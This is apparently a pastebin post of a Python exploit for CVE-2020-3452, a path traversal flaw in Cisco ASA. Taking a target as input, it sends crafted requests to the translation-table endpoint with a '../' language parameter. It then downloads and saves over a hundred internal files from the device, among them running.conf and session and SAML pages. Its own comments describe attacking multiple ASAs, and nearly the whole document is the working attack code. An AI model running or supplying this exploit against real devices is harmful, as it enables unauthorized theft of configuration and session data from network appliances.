FlyFar

CVE-2020-3452.py - Cisco ASA Path Traversal

Jul 30th, 2023
Python 4.52 KB | Cybersecurity | 0 0
  1. import os
  2. import requests
  3.  
  4. # Written by freakyclown for @CygentaHQ
  5. # Cisco ASA Path Traversal
  6. # CVE-2020-3452
  7. # Usage: CVE-2020-3452.py {target}
  8. # Example: CVE-2020-3452.py 192.168.0.12
  9. # Requires - Requests - pip3 install requests
  10. #
  11. # This tool takes advantage of the above CVE and attempts to
  12. # download the files listed below. It is suggested that you make
  13. # a working folder for the output files to avoid confusion if
  14. # attacking multiple ASAs
  15.  
# Host under test, entered interactively. grabstuff() prepends "https://" to
# this value, so give a bare hostname or IP address without a scheme.
target = input("Enter target IP/Url: ")
  18.  
  19.  
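def grabstuff():
    """Request each entry of ``files`` via the translation-table endpoint and save it.

    Reads the module-level ``target`` (host) and ``files`` (relative paths).
    For every path, one GET is sent to ``/+CSCOT+/translation-table`` with the
    path in ``textdomain``; a 200 response body is written to a local file of
    the same relative name under the current working directory.

    Any ``requests`` or ``OSError`` exception propagates to the caller and
    ends the loop.
    """
    url = 'https://' + target + '/+CSCOT+/translation-table'

    for file in files:
        print("trying: ", file)

        # Query string expected by the translation-table handler.
        params = (
            ('type', 'mst'),
            ('textdomain', file),
            ('default-language', ''),
            ('lang', '../'),
        )

        # verify=False turns certificate validation off, so the peer is not
        # authenticated: anything saved below is only as trustworthy as the
        # network path to the device. The timeout keeps one unresponsive
        # host from blocking the whole run.
        response = requests.get(url, params=params, verify=False, timeout=30)

        # A non-200 answer is an error page, not the requested file. Saving it
        # under the file's name would make the output directory look like a
        # positive finding for a device that refused the request.
        if response.status_code != 200:
            print("skipped (HTTP %s): " % response.status_code, file)
            continue

        # Mirror the remote layout locally; exist_ok avoids the check-then-create race.
        directory = os.path.dirname(file)
        if directory:
            os.makedirs(directory, exist_ok=True)

        # Write the raw bytes: response.text re-decodes the body and corrupts
        # binary entries such as logo.gif. The context manager closes the file
        # even if the write raises.
        with open(file, "wb") as f:
            f.write(response.content)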
  41.  
  42.  
  43.  
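# Relative paths requested by grabstuff(); each one is also used as the local
# output path. This is a set, so iteration order is not the order written here.
# The author notes the list is incomplete and welcomes additions.
# Fix: the first "+CSCOE+/logon.html" line had no trailing comma, so Python
# joined it with the next literal into a single bogus entry.
files = {
"+CSCOCA+/ca_inc.lua",
"+CSCOCA+/crl/asa_ca.crl",
"+CSCOCA+/enroll.html",
"+CSCOCA+/login.html",
"+CSCOE+/041235123432C2",
"+CSCOE+/041235123432U2",
"+CSCOE+/app_index.html",
"+CSCOE+/appstart.js",
"+CSCOE+/appstatus",
"+CSCOE+/ask.html",
"+CSCOE+/auth.html",
"+CSCOE+/autosignon_api.js",
"+CSCOE+/blank.html",
"+CSCOE+/cedf.html",
"+CSCOE+/cedhelp.html",
"+CSCOE+/ced.html",
"+CSCOE+/cedlogon.html",
"+CSCOE+/cedmain.html",
"+CSCOE+/cedportal.html",
"+CSCOE+/cedsave.html",
"+CSCOE+/cert.html",
"+CSCOE+/color_picker.html",
"+CSCOE+/color_picker.js",
"+CSCOE+/common.js",
"+CSCOE+/commonspawn.js",
"+CSCOE+/display_bookmarks.lua",
"+CSCOE+/files/browse.html",
"+CSCOE+/files/domains_retr",
"+CSCOE+/files/file_action.html",
"+CSCOE+/files/files.js",
"+CSCOE+/files/files_retr",
"+CSCOE+/files/webfolder",
"+CSCOE+/files/wfolder",
"+CSCOE+/gp-gip.html",
"+CSCOE+/handler",
"+CSCOE+/help/webvpn_help",
"+CSCOE+/home/index.html",
"+CSCOE+/http_auth.html",
"+CSCOE+/include/browser_inc.lua",
"+CSCOE+/include/common.lua",
"+CSCOE+/include/plugin.lua",
"+CSCOE+/lced.html",
"+CSCOE+/load_bookmarks.lua",
"+CSCOE+/localization_inc.lua",
"+CSCOE+/logo.gif",
"+CSCOE+/logon_custom.css",
"+CSCOE+/logon_forms.js",
"+CSCOE+/logon.html",
"+CSCOE+/logon_redirect.html",
"+CSCOE+/logout.html",
"+CSCOE+/message.html",
"+CSCOE+/noportal.html",
"+CSCOE+/nostcaccess.html",
"+CSCOE+/no_svc.html",
"+CSCOE+/ping.html",
"+CSCOE+/pluginlib.js",
"+CSCOE+/portal_ce.html",
"+CSCOE+/portal.css",
"+CSCOE+/portal_custom.css",
"+CSCOE+/portal_elements.html",
"+CSCOE+/portal_forms.js",
"+CSCOE+/portal.html",
"+CSCOE+/portal_inc.lua",
"+CSCOE+/portal.js",
"+CSCOE+/posturl.html",
"+CSCOE+/preview.html",
"+CSCOE+/relayjar.html",
"+CSCOE+/relaymonjar.html",
"+CSCOE+/relaymonocx.html",
"+CSCOE+/relayocx.html",
"+CSCOE+/running.conf",
"+CSCOE+/saml/sp/acs",
"+CSCOE+/saml/sp/login",
"+CSCOE+/saml/sp/metadata",
"+CSCOE+/save_capture.html",
"+CSCOE+/sdesktop/fail.html",
"+CSCOE+/sdesktop/logout.html",
"+CSCOE+/sdesktop/scan.xml",
"+CSCOE+/sdesktop/tokenrenew.xml",
"+CSCOE+/sdesktop/token.xml",
"+CSCOE+/sdesktop/wait.html",
"+CSCOE+/sdesktop/webstart.xml",
"+CSCOE+/session.js",
"+CSCOE+/session_password.html",
"+CSCOE+/sess_update.html",
"+CSCOE+/shshim",
"+CSCOE+/shshimdo_url",
"+CSCOE+/smart_tunnel_install.html",
"+CSCOE+/st_dl.json",
"+CSCOE+/svc.html",
"+CSCOE+/tlbr",
"+CSCOE+/tlbrportal_forms.js",
"+CSCOE+/tunnel_linux.jnlp",
"+CSCOE+/tunnel_mac.html",
"+CSCOE+/tunnel_mac.jnlp",
"+CSCOE+/useralert.html",
"+CSCOE+/user_dialog.html",
"+CSCOE+/win.js",
"+CSCOE+/wrong_url.html",
"+CSCOL+/cte_fallback.js",
"+CSCOL+/cte.js",
"+CSCOL+/relayparam.js",
"+CSCOL+/sw.js",
"+CSCOL+/xsl.js",
"CSCOSSLC/config-auth",
"+CSCOT+/oem-customization",
"+CSCOT+/translation",
"+CSCOT+/translation-table",
"+CSCOU+/anyconnect_unsupported_version.html",
"+CSCOU+/anyconnect_wrong_url.html",
"+CSCOU+/portal.css",
"+CSCOU+/sample.html",
"locale/manifest_data.lua",
}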
  162.  
  163.  
# Run the retrieval loop. Any exception is reported on stdout instead of
# being raised, so a failure ends the run without a traceback.
try:
    grabstuff()
except Exception as exc:
    print("Something went wrong, sorry", exc, sep="\n")
  170.  
  171.  
Tags: Exploit asa cisco